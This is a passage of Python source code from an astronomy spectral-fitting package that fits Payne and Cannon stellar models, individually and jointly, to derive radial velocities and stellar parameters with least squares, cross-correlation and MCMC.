chisq2 = dln.interp(vel,chisq,vel2) bestind = np.argmin(chisq2) finerv = vel2[bestind] finechisq = chisq2[bestind] if verbose is True: print('Fine grid best RV = %5.2f km/s' % finerv) print('chisq = %5.2f' % finechisq) # Final parameters and uncertainties (so far) fpars = lsout['pars'][0] fperror = lsout['parerr'][0] fpars[rvind] = finerv fchisq = finechisq finput = dict(zip(fitparams,fpars.copy())) finput['RV'] = finerv flabels = model.mklabels(finput) fmodel = model(flabels) # Step 6: MCMC #-------------- if (mcmc is True) | (cornername is not None): mcout, mcmodel = fit_mcmc_payne(specm,model,fitparams=fitparams,fixparams=fixparams, initpar=fpars,verbose=verbose,cornername=cornername) # Use these parameters fpars = mcout['pars'][0] fperror = mcout['parerr'][0] fchisq = mcout['chisq'][0] fmodel = mcmodel # Construct the output #--------------------- vrel = fpars[rvind] vrelerr = fperror[rvind] bc = specm.barycorr() vhelio = vrel + bc if verbose is True: print('Final parameters:') printpars(fpars,fperror,names=fitparams) print('Vhelio = %6.2f +/- %5.2f km/s' % (vhelio,vrelerr)) print('BC = %5.2f km/s' % bc) print('chisq = %5.2f' % fchisq) dtlist = [('vhelio',np.float32),('vrel',np.float32),('vrelerr',np.float32)] for k in range(nfitparams): name = fitparams[k].lower() if name is not 'rv': # Skip RV dtlist += [(name,np.float32),(name+'err',np.float32)] dtlist += [('chisq',np.float32),('bc',np.float32)] dtype = np.dtype(dtlist) out = np.zeros(1,dtype=dtype) out['vhelio'] = vhelio out['vrel'] = vrel out['vrelerr'] = vrelerr for k in range(nfitparams): name = fitparams[k].lower() if name is not 'rv': # Skip RV out[name] = fpars[k] out[name+'err'] = fperror[k] out['chisq'] = fchisq out['bc'] = bc # Make diagnostic figure if figfile is not None: # Apply continuum tweak to original spectrum as well cratio = specm.cont/spec.cont orig = spec.copy() orig.flux /= cratio orig.err /= cratio orig.cont *= cratio # Make the diagnostic figure annotlabels = np.char.array(fitparams).lower() annotlabels[rvind] = 'vrel' specfigure(figfile,specm,fmodel,out,original=orig,verbose=verbose,ispayne=True,annotlabels=annotlabels) # How long did this take if verbose is True: print('dt = %5.2f sec.' % (time.time()-t0)) return out, fmodel, specm def multifit_lsq_payne(speclist,modlist,fitparams=None,fixparams={},initpar=None,verbose=False): """ Least Squares fitting with forward modeling of multiple spectra simultaneously. Parameters ---------- speclist : Spec1D object List of the observed spectra to match. modlist : list of Doppler Payne models A list of the prepared Doppler Payne models to use, one set for each observed spectrum. fitparams : list of labels, optional List of Payne parameter/label names to fit (excluding RV). Optional. The default values are ['TEFF','LOGG','FE_H','ALPHA_H']. fixparams : dict, optional Dictionary of parameters to hold fixed. initpar : numpy array, optional Initial estimate for [teff, logg, feh, RV, etc.], optional. verbose : bool, optional Verbose output of the various steps. This is False by default. Returns ------- out : numpy structured array The output structured array of the final derived RVs, stellar parameters and errors. bmodel : Spec1D object The best-fitting Payne model spectrum (as Spec1D object). Example ------- .. code-block:: python out, bmodel = multifit_lsq_payne(speclist,modlist,initpar) """ print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging nspec = len(speclist) # Fitting parameters, excluding RV if fitparams is None: fitparams = ['TEFF','LOGG','FE_H','ALPHA_H'] # Make sure RV is excluded, that is handled separately fitparams = np.char.array(fitparams) fitparams = list(fitparams[np.char.array(fitparams).upper().find('RV')==-1]) nfitparams = len(fitparams) nfixparams = len(fixparams) # Get initial estimates npar = nfitparams+nspec # Initial estimates if initpar is None: initpar1 = make_payne_initlabels(fitparams) initpar = np.hstack((initpar1,np.zeros(nspec,float))) # Calculate the bounds lbounds = np.zeros(npar,float)+1e5 ubounds = np.zeros(npar,float)-1e5 labelbounds = make_payne_bounds(fitparams,initpar[0:nfitparams]) lbounds[0:nfitparams] = labelbounds[0] ubounds[0:nfitparams] = labelbounds[1] lbounds[nfitparams:] = -1000 ubounds[nfitparams:] = 1000 bounds = (lbounds, ubounds) # Initialize the fitter spfitter = payne.PayneMultiSpecFitter(speclist,modlist,fitparams,fixparams=fixparams,verbose=verbose) # Put all of the spectra into a large 1D array ntotpix = 0 for s in speclist: ntotpix += s.npix*s.norder wave = np.zeros(ntotpix) flux = np.zeros(ntotpix) err = np.zeros(ntotpix) cnt = 0 for i in range(nspec): spec1 = speclist[i] npx = spec1.npix*spec1.norder wave[cnt:cnt+npx] = spec1.wave.T.flatten() flux[cnt:cnt+npx] = spec1.flux.T.flatten() err[cnt:cnt+npx] = spec1.err.T.flatten() cnt += npx # We are fitting nfitparams stellar parameters and Nspec relative RVs lspars, lscov = curve_fit(spfitter.model, wave, flux, sigma=err, p0=initpar, bounds=bounds, jac=spfitter.jac) # If it hits a boundary then the solution won't chance much compared to initpar # setting absolute_sigma=True gives crazy low lsperror values lsperror = np.sqrt(np.diag(lscov)) if verbose is True: print('Least Squares labels and RVs:') parnames = fitparams.copy()+list('RV'+np.char.array((np.arange(nspec)+1).astype(str))) printpars(lspars,lsperror,names=parnames) lsmodel = spfitter.model(wave,*lspars) lschisq = np.sqrt(np.sum(((flux-lsmodel)/err)**2)/len(lsmodel)) if verbose is True: print('chisq = %5.2f' % lschisq) # Put it into the output structure dtype = np.dtype([('pars',float,npar),('parerr',float,npar),('parcov',float,(npar,npar)),('chisq',float)]) out = np.zeros(1,dtype=dtype) out['pars'] = lspars out['parerr'] = lsperror out['parcov'] = lscov out['chisq'] = lschisq return out, lsmodel def jointfit_payne(speclist,model=None,fitparams=None,fixparams={},mcmc=False,snrcut=10.0, saveplot=False,verbose=False,outdir=None,nthreads=None, notweak=False,tpoly=False,tpolyorder=3): """ This fits a Payne model to multiple spectra of the same star. Parameters ---------- speclist : Spec1D object The observed spectrum to match. model : Payne model, optional Payne model to use. The default is to load the Payne model in the data/ directory and use those. fitparams : list of labels, optional List of Payne parameter/label names to fit (excluding RV). Optional. The default values are ['TEFF','LOGG','FE_H','ALPHA_H']. fixparams : dict, optional Dictionary of parameters to hold fixed. mcmc : bool, optional Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties. This is only run the individual spectra are being fit. This is False by default. snrcut : int, optional S/N cut to fit individual spectra in the first step. The default is snrcut=10. saveplot : bool, optional Save output plots. verbose : bool, optional Verbose output of the various steps. This is False by default. outdir : str, optional The directory for output files. The default is to use the current directory. nthreads : int, optional The number of threads to use. By default the number of threads is not limited. notweak : boolean, optional Don't tweak the observed continuum using the model. Default is False. tpoly : boolean, optional Use a low-order polynomial fit for continuum tweaking. Default is False, it uses Gaussian smoothing instead. tpolyorder : int, optional Polynomial order to use for continuum tweaking if tpoly=True. Default is 3 (cubic). Returns ------- sumstr : numpy structured array Summary catalog of final best-fit values. final : Final best-fit values for each individual spectrum. bmodel : List of Spec1D object List of best-fitting model spectra. specmlist : list of Spec1D object List of the observed spectrua with discrepant and outlier pixels masked. Example ------- .. code-block:: python sumstr, final, bmodel, specmlist = jointfit_payne(speclist) """ print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging nspec = len(speclist) t0 = time.time() # Set threads if nthreads is not None: os.environ["OMP_NUM_THREADS"] = str(nthreads) os.environ["OPENBLAS_NUM_THREADS"] = str(nthreads) os.environ["MKL_NUM_THREADS"] = str(nthreads) os.environ["VECLIB_MAXIMUM_THREADS"] = str(nthreads) os.environ["NUMEXPR_NUM_THREADS"] = str(nthreads) # If list of filenames input, then load them # Load the Payne model #--------------------- if model is None: model = payne.load_models() # Fitting parameters, excluding RV if fitparams is None: fitparams = ['TEFF','LOGG','FE_H','ALPHA_H'] if verbose: print('Fitting: '+', '.join(fitparams)) # Make sure RV is excluded, that is handled separately fitparams = np.char.array(fitparams) fitparams = list(fitparams[np.char.array(fitparams).upper().find('RV')==-1]) nfitparams = len(fitparams) nfixparams = len(fixparams) if verbose: print('Jointly fitting Payne model to '+str(nspec)+' spectra with parameters: '+ ', '.join(fitparams)+' and RV for each spectrum') # Creating catalog of info on each spectrum dtlist = [('filename',np.str,300),('snr',float),('vhelio',float),('vrel',float),('vrelerr',float)] for k in range(nfitparams): name = fitparams[k].lower() dtlist += [(name,np.float32),(name+'err',np.float32)] dtlist += [('chisq',float),('bc',float)] dt = np.dtype(dtlist) info = np.zeros(nspec,dtype=dt) for n in dt.names: info[n] = np.nan for i,s in enumerate(speclist): info['filename'][i] = s.filename info['snr'][i] = s.snr # Make sure some spectra pass the S/N cut hisnr, nhisnr = dln.where(info['snr']>snrcut) if nhisnr < np.ceil(0.25*nspec): snr = np.flip(np.sort(info['snr'])) snrcut = snr[np.maximum(np.int(np.ceil(0.25*nspec)),np.minimum(4,nspec-1))] if verbose is True: print('Lowering S/N cut to %5.1f so at least 25%% of the spectra pass the cut' % snrcut) # Step 1) Loop through each spectrum and run fit() if verbose is True: print('Step #1: Fitting the individual spectra') specmlist = [] modlist = [] for i in range(len(speclist)): spec = speclist[i].copy() if verbose is True: print('Fitting spectrum '+str(i+1)) print(speclist[i].filename) # Only do this for spectra with S/N>10 or 15 if spec.snr>snrcut: # Save the plot, figure the output figure filename figfile = None if saveplot is True: fdir, base, ext = utils.splitfilename(speclist[i].filename) figfile = base+'_dopfit.png' if outdir is not None: figfile = outdir+'/'+figfile if (outdir is None) & (fdir != ''): figfile = fdir+'/'+figfile # Fit the spectrum fitparams1 = fitparams+['RV'] # make sure to fit the RV out, bmodel, specm = fit_payne(spec,fitparams=fitparams1,fixparams=fixparams, verbose=verbose,mcmc=mcmc,figfile=figfile, notweak=notweak,tpoly=tpoly,tpolyorder=tpolyorder) # Save the "prepared" DopplerPayneModel object, but don't # copy the original data (~200MB). pmodel = model.copy() # points to original data pmodel.prepare(specm) # Now prepare the model modlist.append(pmodel) specmlist.append(specm.copy()) info['vhelio'][i] = out['vhelio'] info['vrel'][i] = out['vrel'] info['vrelerr'][i] = out['vrelerr'] for k in range(nfitparams): name = fitparams[k].lower() info[name][i] = out[name] info[name+'err'][i] = out[name+'err'] info['chisq'][i] = out['chisq'] info['bc'][i] = out['bc'] else: if verbose is True: print('Skipping: S/N=%6.1f below threshold of %6.1f. Loading spectrum and preparing models.' % (spec.snr,snrcut)) # Just get the spectrum sp = speclist[i].copy() sp = utils.specprep(sp) # mask and normalize # Mask outliers sp = utils.maskoutliers(sp) specmlist.append(sp) # Save the "prepared" DopplerPayneModel object, but don't # copy the original data (~200MB). pmodel = model.copy() # points to original data pmodel.prepare(sp) # Now prepare the model modlist.append(pmodel) specmlist.append(specm.copy()) # at least need BC info['bc'][i] = speclist[i].barycorr() if verbose is True: print(' ') # Step 2) Find weighted mean labels if verbose is True: print('Step #2: Getting weighted mean labels') gd, ngd = dln.where(np.isfinite(info['chisq'])) if ngd>0: pars = list(np.char.array(fitparams).lower())+['vhelio'] parerr = list(np.char.array(fitparams).lower()+'err')+['vrelerr'] wtpars = np.zeros(len(pars),float) for i in range(len(pars)): p = info[pars[i]][gd] perr = info[parerr[i]][gd] gdp,ngdp,bdp,nbdp = dln.where(perr > 0.0,comp=True) # Weighted by 1/perr^2 if ngdp>0: if (nbdp>0): perr[bdp] = np.max(perr[gdp])*2 mnp = dln.wtmean(p,perr) wtpars[i] = mnp # Unweighted else: wtpars[i] = np.mean(p) if verbose is True: print('Initial weighted parameters are:') printpars(wtpars,names=np.char.array(pars).upper()) else: wtpars = np.zeros(nfitparams+1,float) wtpars = make_payne_initlabels(fitparams+['RV']) if verbose is True: print('No good fits. Using these as intial guesses:') printpars(wtpars) # Make initial guesses for all the parameters, nfitparams labels and Nspec relative RVs initpar1 = np.zeros(nfitparams+nspec,float) initpar1[0:nfitparams] = wtpars[0:nfitparams] # the default is to use mean vhelio + BC for all visit spectra initpar1[nfitparams:] = wtpars[nfitparams]-info['bc'] # vhelio = vrel + BC # Use the Vrel values from the initial fitting if they are accurate enough gdinit,ngdinit = dln.where(np.isfinite(info['vrel']) & (info['snr']>5)) if ngdinit>0: initpar1[nfitparams+gdinit] = info['vrel'][gdinit] # Step 3) Refit all spectra simultaneous fitting stellar parameters and RVs if verbose is True: print(' ') print('Step #3: Fitting all spectra simultaneously') out1, fmodels1 = multifit_lsq_payne(specmlist,modlist,fitparams=fitparams, fixparams=fixparams,initpar=initpar1) stelpars1 = out1['pars'][0,0:nfitparams] stelparerr1 = out1['parerr'][0,0:nfitparams] vrel1 = out1['pars'][0,nfitparams:] vrelerr1 = out1['parerr'][0,nfitparams:] vhelio1 = vrel1+info['bc'] medvhelio1 = np.median(vhelio1) vscatter1 = dln.mad(vhelio1) verr1 = vscatter1/np.sqrt(nspec) if verbose is True: print('Parameters:') printpars(stelpars1,names=fitparams) print('Vhelio = %6.2f +/- %5.2f km/s' % (medvhelio1,verr1)) print('Vscatter = %6.3f km/s' % vscatter1) print('Vhelio values = ',vhelio1) # Step 4) Tweak continua and remove outlies if verbose is True: print(' ') print('Step #4: Tweaking continuum and masking outliers') if notweak is False: for i,spm in enumerate(specmlist): # Create parameter list that includes RV at the end params1 = list(stelpars1)+[vrel1[i]] paramnames1 = fitparams+['RV'] parinput1 = dict(zip(paramnames1,params1)) model1 = modlist[i] labels1 = model1.mklabels(parinput1) bestm = model1(labels1) # Tweak the continuum normalization spm = tweakcontinuum(spm,bestm,usepoly=tpoly,polyorder=tpolyorder) # Mask out very discrepant pixels when compared to the best-fit model spm = utils.maskdiscrepant(spm,bestm,verbose=verbose) specmlist[i] = spm.copy() else: if verbose: print('Skipping tweaking') # Step 5) refit all spectra simultaneous fitting stellar parameters and RVs if verbose is True: print(' ') print('Step #5: Re-fitting all spectra simultaneously') # Initial guesses for all the parameters, nfitparams stellar parameters and Nspec relative RVs initpar2 = out1['pars'][0] out2, fmodels2 = multifit_lsq_payne(specmlist,modlist,fitparams=fitparams, fixparams=fixparams,initpar=initpar2) stelpars2 = out2['pars'][0,0:nfitparams] stelparerr2 = out2['parerr'][0,0:nfitparams] vrel2 = out2['pars'][0,nfitparams:] vrelerr2 = out2['parerr'][0,nfitparams:] vhelio2 = vrel2+info['bc'] medvhelio2 = np.median(vhelio2) vscatter2 = dln.mad(vhelio2) verr2 = vscatter2/np.sqrt(nspec) if verbose is True: print('Final parameters:') printpars(stelpars2,names=fitparams) print('Vhelio = %6.2f +/- %5.2f km/s' % (medvhelio2,verr2)) print('Vscatter = %6.3f km/s' % vscatter2) print('Vhelio values = ',vhelio2) # Final output structure, one element per spectrum final = info.copy() for k in range(nfitparams): name = fitparams[k].lower() info[name] = stelpars2[k] info[name+'err'] = stelparerr2[k] final['vrel'] = vrel2 final['vrelerr'] = vrelerr2 final['vhelio'] = vhelio2 bmodel = [] totchisq = 0.0 totnpix = 0 for i in range(nspec): # Create parameter list that includes RV at the end params1 = list(stelpars2)+[vrel2[i]] paramnames1 = fitparams+['RV'] parinput1 = dict(zip(paramnames1,params1)) model1 = modlist[i] labels1 = model1.mklabels(parinput1) m = model1(labels1) sp1 = specmlist[i] chisq = np.sqrt(np.sum(((sp1.flux-m.flux)/sp1.err)**2)/(sp1.npix*sp1.norder)) totchisq += np.sum(((sp1.flux-m.flux)/sp1.err)**2) totnpix += sp1.npix*sp1.norder final['chisq'][i] = chisq bmodel.append(m) totchisq = np.sqrt(totchisq/totnpix) # Average values sumdtlist = [('medsnr',float),('totsnr',float),('vhelio',float),('vscatter',float),('verr',float)] for k in range(nfitparams): name = fitparams[k].lower() sumdtlist += [(name,np.float32),(name+'err',np.float32)] sumdtlist += [('chisq',float)] sumdt = np.dtype(sumdtlist) sumstr = np.zeros(1,dtype=sumdt) sumstr['medsnr'] = np.median(info['snr']) sumstr['totsnr'] = np.sqrt(np.sum(info['snr']**2)) sumstr['vhelio'] = medvhelio2 sumstr['vscatter'] = vscatter2 sumstr['verr'] = verr2 for k in range(nfitparams): name = fitparams[k].lower() sumstr[name] = stelpars2[k] sumstr[name+'err'] = stelparerr2[k] sumstr['chisq'] = totchisq # Save the best-fitting plots if saveplot is True: if verbose is True: print('') print('Making best-fit plots for each spectrum') pdfnames = [] specfiles = [s.filename for s in speclist] for i,f in enumerate(specfiles): # Figure the output figure filename fdir,base,ext = utils.splitfilename(speclist[i].filename) figname = base+'_dopjointfit.png' if outdir is not None: figname = outdir+'/'+figname if (outdir is None) & (fdir != ''): figname = fdir+'/'+figname # Make the plot spec = speclist[i] specm = specmlist[i] fmodel = bmodel[i] fout = final[i] # Apply continuum tweak to original spectrum as well orig = spec.copy() if orig.normalized is False: orig.normalize() cratio = specm.cont/orig.cont orig.flux /= cratio orig.err /= cratio orig.cont *= cratio annotlabels = np.char.array(fitparams+['RV']).lower() annotlabels[-1] = 'vrel' specfigure(figname,specm,fmodel,fout,original=orig,verbose=True, ispayne=True,annotlabels=annotlabels) # Make a PDF version that we will combine at the end fignamepdf = figname.replace('.png','.pdf') specfigure(fignamepdf,specm,fmodel,fout,original=orig,verbose=False, ispayne=True,annotlabels=annotlabels) pdfnames.append(fignamepdf) # Combine the PDFs into one fdir,base,ext = utils.splitfilename(specfiles[0]) combname = base+'_dopjointfit_comb.pdf' # png if outdir is not None: combname = outdir+'/'+combname if (outdir is None) & (fdir != ''): combname = fdir+'/'+combname if os.path.exists(combname): os.remove(combname) cmd = ['gs','-dBATCH','-dNOPAUSE','-q','-sDEVICE=pdfwrite','-sOutputFile='+combname] cmd = cmd+pdfnames try: out = subprocess.call(cmd,stderr=subprocess.STDOUT,shell=False) if verbose: print('Combined plots saved to '+combname) except subprocess.CalledProcessError: raise Exception("Could not combine PDFs with ghostscript") # Delete individual PDFs for fp in pdfnames: os.remove(fp) # How long did this take if verbose is True: print('dt = %5.2f sec.' % (time.time()-t0)) return sumstr, final, bmodel, specmlist ######################### CANNON PROGRAMS ########################### def emcee_lnlike_cannon(theta, x, y, yerr, models, spec): """ This helper function calculates the log likelihood for the MCMC portion of fit(). Parameters ---------- theta : array Input parameters [teff, logg, feh, rv]. x : array Array of x-values for y. Not really used. y : array Observed flux array. yerr : array Uncertainties in the observed flux. models : list of Cannon models List of Cannon models to use spec : Spec1D The observed spectrum. Needed to run cannon.model_spectrum(). Outputs ------- lnlike : float The log likelihood value. """ #m = cannon.model_spectrum(models,spec,teff=theta[0],logg=theta[1],feh=theta[2],rv=theta[3]) m = models(teff=theta[0],logg=theta[1],feh=theta[2],rv=theta[3]) inv_sigma2 = 1.0/yerr**2 return -0.5*(np.sum((y-m.flux.flatten())**2*inv_sigma2)) def emcee_lnprior_cannon(theta, models): """ This helper function calculates the log prior for the MCMC portion of fit(). It's a flat/uniform prior across the stellar parameter space covered by the Cannon models. Parameters ---------- theta : array Input parameters [teff, logg, feh, rv]. models : list of Cannon models List of Cannon models to use Outputs ------- lnprior : float The log prior value. """ for m in models: inside = True for i in range(3): inside &= (theta[i]>=m.ranges[i,0]) & (theta[i]<=m.ranges[i,1]) inside &= (np.abs(theta[3]) <= 1000) if inside: return 0.0 return -np.inf def emcee_lnprob_cannon(theta, x, y, yerr, models, spec): """ This helper function calculates the log probability for the MCMC portion of fit(). Parameters ---------- theta : array Input parameters [teff, logg, feh, rv]. x : array Array of x-values for y. Not really used. y : array Observed flux array. yerr : array Uncertainties in the observed flux. models : list of Cannon models List of Cannon models to use spec : Spec1D The observed spectrum. Needed to run cannon.model_spectrum(). Outputs ------- lnprob : float The log probability value, which is the sum of the log prior and the log likelihood. """ lp = emcee_lnprior_cannon(theta,models) if not np.isfinite(lp): return -np.inf return lp + emcee_lnlike_cannon(theta, x, y, yerr, models, spec) def fit_xcorrgrid_cannon(spec,models=None,samples=None,verbose=False,maxvel=1000.0): """ Fit spectrum using cross-correlation with models sampled in the parameter space. Parameters ---------- spec : Spec1D object The observed spectrum to match. models : list of Cannon models, optional A list of Cannon models to use. The default is to load all of the Cannon models in the data/ directory and use those. samples : numpy structured array, optional Catalog of teff/logg/feh parameters to use when sampling the parameter space. verbose : bool, optional Verbose output of the various steps. This is False by default. maxvel : float, optional The maximum velocity to probe in the cross-correlation. The default is 1000 km/s. Returns ------- out : numpy structured array The output structured array of the final derived RVs, stellar parameters and errors. bmodel : Spec1D object The best-fitting Cannon model spectrum (as Spec1D object). Example ------- .. code-block:: python out, bmodel = fit_xcorrgrid_cannon(spec) """ print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging # Check that the samples input has the right columns if samples is not None: for n in ['teff','logg','feh']: try: dum = samples[n] except: raise ValueError(n+' not found in input SAMPLES') # Step 1: Prepare the spectrum #----------------------------- # normalize and mask spectrum spec = utils.specprep(spec) # Step 2: Load and prepare the Cannon models #------------------------------------------- if models is None: models = cannon.models.copy() models.prepare(spec) # Step 3: put on logarithmic wavelength grid #------------------------------------------- wavelog = utils.make_logwave_scale(spec.wave,vel=0.0) # get new wavelength solution obs = spec.interp(wavelog) # The LSF information will not be correct if using Gauss-Hermite, it uses a Gaussian approximation # it's okay because the "models" are prepared for the original spectra (above) # Step 4: get initial RV using cross-correlation with rough sampling of Teff/logg parameter space #------------------------------------------------------------------------------------------------ dwlog = np.median(dln.slope(np.log10(wavelog))) # vrel = ( 10**(xshift*dwlog)-1 )*cspeed maxlag = np.int(np.ceil(np.log10(1+maxvel/cspeed)/dwlog)) maxlag = np.maximum(maxlag,50) if samples is None: #teff = [3500.0, 4000.0, 5000.0, 6000.0, 7500.0, 9000.0, 15000.0, 25000.0, 40000.0, 3500.0, 4300.0, 4700.0, 5200.0] #logg = [4.8, 4.8, 4.6, 4.4, 4.0, 4.0, 4.0, 4.0, 8.0, 0.5, 1.0, 2.0, 3.0] # temporarily remove WD until that's fixed teff = [3500.0, 4000.0, 5000.0, 6000.0, 7500.0, 15000.0, 25000.0, 40000.0, 3500.0, 4300.0, 4700.0, 5200.0] logg = [4.8, 4.8, 4.6, 4.4, 4.0, 4.0, 4.0, 4.0, 0.5, 1.0, 2.0, 3.0] feh = -0.5 dt = np.dtype([('teff',float),('logg',float),('feh',float)]) samples = np.zeros(len(teff),dtype=dt) samples['teff'][:] = teff samples['logg'][:] = logg samples['feh'][:] = feh outdtype = np.dtype([('xshift',np.float32),('vrel',np.float32),('vrelerr',np.float32),('ccpeak',np.float32),('ccpfwhm',np.float32), ('chisq',np.float32),('teff',np.float32),('logg',np.float32),('feh',np.float32)]) outstr = np.zeros(len(teff),dtype=outdtype) if verbose is True: print('TEFF LOGG FEH VREL CCPEAK CHISQ') for i in range(len(samples)): m = models([samples['teff'][i],samples['logg'][i],samples['feh'][i]],rv=0,wave=wavelog) outstr1 = specxcorr(m.wave,m.flux,obs.flux,obs.err,maxlag) if verbose is True: print('%7.2f %5.2f %5.2f %5.2f %5.2f %5.2f' % (teff[i],logg[i],feh,outstr1['vrel'][0],outstr1['ccpeak'][0],outstr1['chisq'][0])) for n in ['xshift','vrel','vrelerr','ccpeak','ccpfwhm','chisq']: outstr[n][i] = outstr1[n] outstr['teff'][i] = teff[i] outstr['logg'][i] = logg[i] outstr['feh'][i] = feh # Get best fit bestind = np.argmin(outstr['chisq']) beststr = outstr[bestind] bestmodel = models(teff=beststr['teff'],logg=beststr['logg'],feh=beststr['feh'],rv=beststr['vrel']) if verbose is True: print('Initial RV fit:') printpars([beststr['teff'],beststr['logg'],beststr['feh'],beststr['vrel']],[None,None,None,beststr['vrelerr']]) return beststr, bestmodel def fit_lsq_cannon(spec,models=None,initpar=None,verbose=False): """ Least Squares fitting with forward modeling of the spectrum. Parameters ---------- spec : Spec1D object The observed spectrum to match. models : list of Cannon models, optional A list of Cannon models to use. The default is to load all of the Cannon models in the data/ directory and use those. initpar : numpy array, optional Initial estimate for [teff, logg, feh, RV], optional. verbose : bool, optional Verbose output of the various steps. This is False by default. Returns ------- out : numpy structured array The output structured array of the final derived RVs, stellar parameters and errors. bmodel : Spec1D object The best-fitting Cannon model spectrum (as Spec1D object). Example ------- .. code-block:: python out, bmodel = fit_lsq_cannon(spec) """ print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging # Prepare the spectrum #----------------------------- # normalize and mask spectrum if spec.normalized is False: spec = utils.specprep(spec) # Load and prepare the Cannon models #------------------------------------------- if models is None: models = cannon.models.copy() models.prepare(spec) # Get initial estimates if initpar is None: initpar = np.array([6000.0, 2.5, -0.5, 0.0]) initpar = np.array(initpar).flatten() # Calculate the bounds lbounds = np.zeros(4,float)+1e5 ubounds = np.zeros(4,float)-1e5 for p in models: lbounds[0:3] = np.minimum(lbounds[0:3],np.min(p.ranges,axis=1)) ubounds[0:3] = np.maximum(ubounds[0:3],np.max(p.ranges,axis=1)) lbounds[3] = -1000 ubounds[3] = 1000 bounds = (lbounds, ubounds) # Make sure RV is in the boundaries initpar[3] = dln.limit(initpar[3],-999,999) # function to use with curve_fit def spec_interp(x,teff,logg,feh,rv): """ This returns the interpolated model for a given spectrum.""" # The "models" and "spec" must already exist outside of this function m = models(teff=teff,logg=logg,feh=feh,rv=rv) if m is None: return np.zeros(spec.flux.shape,float).flatten()+1e30 return m.flux.flatten() # Use curve_fit lspars, lscov = curve_fit(spec_interp, spec.wave.flatten(), spec.flux.flatten(), sigma=spec.err.flatten(), p0=initpar, bounds=bounds) # If it hits a boundary then the solution won't change much compared to initpar # setting absolute_sigma=True gives crazy low lsperror values lsperror = np.sqrt(np.diag(lscov)) if verbose is True: print('Least Squares RV and stellar parameters:') printpars(lspars) lsmodel = models(teff=lspars[0],logg=lspars[1],feh=lspars[2],rv=lspars[3]) lschisq = np.sqrt(np.sum(((spec.flux-lsmodel.flux)/spec.err)**2)/(spec.npix*spec.norder)) if verbose is True: print('chisq = %5.2f' % lschisq) # Put it into the output structure dtype = np.dtype([('pars',float,4),('parerr',float,4),('parcov',float,(4,4)),('chisq',float)]) out = np.zeros(1,dtype=dtype) out['pars'] = lspars out['parerr'] = lsperror out['parcov'] = lscov out['chisq'] = lschisq return out, lsmodel def fit_mcmc_cannon(spec,models=None,initpar=None,steps=100,cornername=None,verbose=False): """ Fit the spectrum with MCMC. Parameters ---------- spec : Spec1D object The observed spectrum to match. models : list of Cannon models, optional A list of Cannon models to use. The default is to load all of the Cannon models in the data/ directory and use those. initpar : numpy array, optional Initial estimate for [teff, logg, feh, RV], optional. steps : int, optional Number of steps to use. Default is 100. cornername : string, optional Output filename for the corner plot. If a corner plot is requested, then the minimum number of steps used is 500. verbose : bool, optional Verbose output of the various steps. This is False by default. Returns ------- out : numpy structured array The output structured array of the final derived RVs, stellar parameters and errors. bmodel : Spec1D object The best-fitting Cannon model spectrum (as Spec1D object). Example ------- .. code-block:: python out, bmodel = fit_mcmc(spec) """ print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging # Prepare the spectrum #----------------------------- # normalize and mask spectrum if spec.normalized is False: spec = utils.specprep(spec) # Load and prepare the Cannon models #------------------------------------------- if models is None: models = cannon.models.copy() models.prepare(spec) # Initial estimates if initpar is None: initpar = [6000.0, 2.5, -0.5, 0.0] # Set up the MCMC sampler ndim, nwalkers = 4, 20 delta = [initpar[0]*0.1, 0.1, 0.1, 0.2] pos = [initpar + delta*np.random.randn(ndim) for i in range(nwalkers)] sampler = emcee.EnsembleSampler(nwalkers, ndim, emcee_lnprob_cannon, args=(spec.wave.flatten(), spec.flux.flatten(), spec.err.flatten(), models, spec)) if cornername is not None: steps=np.maximum(steps,500) # at least 500 steps out = sampler.run_mcmc(pos, steps) samples = sampler.chain[:, np.int(steps/2):, :].reshape((-1, ndim)) # Get the median and stddev values pars = np.zeros(ndim,float) parerr = np.zeros(ndim,float) if verbose is True: print('MCMC values:') names = ['Teff','logg','[Fe/H]','Vrel'] for i in range(ndim): t=np.percentile(samples[:,i],[16,50,84]) pars[i] = t[1] parerr[i] = (t[2]-t[0])*0.5 if verbose is True: printpars(pars,parerr) # The maximum likelihood parameters bestind = np.unravel_index(np.argmax(sampler.lnprobability),sampler.lnprobability.shape) pars_ml = sampler.chain[bestind[0],bestind[1],:] mcmodel = models(teff=pars[0],logg=pars[1],feh=pars[2],rv=pars[3]) mcchisq = np.sqrt(np.sum(((spec.flux-mcmodel.flux)/spec.err)**2)/(spec.npix*spec.norder)) # Put it into the output structure dtype = np.dtype([('pars',float,4),('pars_ml',float,4),('parerr',float,4),('chisq',float)]) out = np.zeros(1,dtype=dtype) out['pars'] = pars out['pars_ml'] = pars_ml out['parerr'] = parerr out['chisq'] = mcchisq # Corner plot if cornername is not None: matplotlib.use('Agg') fig = corner.corner(samples, labels=["T$_eff$", "$\log{g}$", "[Fe/H]", "Vrel"], truths=pars) plt.savefig(cornername) plt.close(fig) print('Corner plot saved to '+cornername) return out,mcmodel def fit_cannon(spectrum,models=None,verbose=False,mcmc=False,figfile=None,cornername=None, retpmodels=False,nthreads=None,notweak=False,tpoly=False,tpolyorder=3): """ Fit the spectrum. Find the best RV and stellar parameters using the Cannon models. Parameters ---------- spectrum : Spec1D object The observed spectrum to match. models : list of Cannon models, optional A list of Cannon models to use. The default is to load all of the Cannon models in the data/ directory and use those. verbose : bool, optional Verbose output of the various steps. This is False by default. mcmc : bool, optional Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties. This is False by default. figfile : string, optional The filename for a diagnostic plot showing the observed spectrum, model spectrum and the best-fit parameters. cornername : string, optional The filename for a "corner" plot showing the posterior distributions from the MCMC run. retpmodels : bool, optional Return the prepared moels. nthreads : int, optional The number of threads to use. By default the number of threads is not limited. notweak : boolean, optional Don't tweak the observed continuum using the model. Default is False. tpoly : boolean, optional Use a low-order polynomial fit for continuum tweaking. Default is False, it uses Gaussian smoothing instead. tpolyorder : int, optional Polynomial order to use for continuum tweaking if tpoly=True. Default is 3 (cubic). Returns ------- out : numpy structured array The output structured array of the final derived RVs, stellar parameters and errors. model : Spec1D object The best-fitting Cannon model spectrum (as Spec1D object). specm : Spec1D object The observed spectrum with discrepant and outlier pixels masked. pmodels : DopplerCannonModelSet The prepared Doppler Cannon models, only if retpmodels=True. Example ------- .. code-block:: python out, model = fit_cannon(spec) """ print = utils.getprintfunc() # 